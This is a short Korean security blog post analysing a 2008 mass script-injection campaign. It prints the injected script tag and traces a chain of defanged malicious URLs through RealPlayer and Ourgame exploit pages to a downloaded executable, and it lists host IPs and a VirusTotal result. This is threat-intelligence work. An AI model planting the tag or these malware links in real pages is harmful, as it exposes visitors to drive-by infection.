헐랭이와 IT보안 (opt9's IT Security)

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다.

<script src=hxxp://sb.5252.ws:88/107/1.js></script>
Googling: 40,400 개 KR 도메인: 0 개 미차단

1.js -> hxxp://w.51yess.com.cn/w1.htm -> news2.html (Ourgame GLWorld exploit)
                                                            -> news.html

news.html -> hxxp://w.51yess.cn/nn/014.js (hxxp://xiazai.dajiayiqifa.cn/job.exe 다운로드 & 실행)
                -> hxxp://w.51yess.cn/nn/Thunder.html (새로운 코드)
                -> hxxp://w.51yess.cn/nn/bf.js (중복 인코딩 시작)
                -> hxxp://w.51yess.cn/nn/real.js (RealPlayer exploit)
                -> hxxp://w.51yess.cn/nn/Real.html (RealPlayer exploit, 새로운 코드)
                -> hxxp://xiazai.dajiayiqifa.cn/job.exe

job.exe 의 VirusTotal 결과 : http://www.virustotal.com/ko/analisis/e1501d1ee564454c462b2940da7a75fe (22/31 개 진단)
(AVG 7.5는 진단 못하나 8 버전은 Worm/Small.2.R 로 진단)

sb.5252.ws [202.153.110.213] (08-04-12, Hong Kong, CN)
w.51yess.com.cn [121.10.113.242] (08-04-09, Guangzhou, CN)
w.51yess.cn [121.10.113.242] (08-04-09, Guangzhou, CN)
xiazai.dajiayiqifa.cn [59.34.216.76] (08-04-09, Guangzhou, CN)

이외에도 w.51yess.cn 서버는 hxxp://w.51yess.cn/w3.htm, w2m 을 준비해놓은 상태임.
이 코드의 주요 피해 사이트가 중국에 밀집해있다는 것이 흥미로운 점.
중국백신이 job.exe 를 제대로 진단 못하고 있기 때문에 중국쪽의 좀비 PC가 많아질 듯.

이글루스 가든 - professional secur...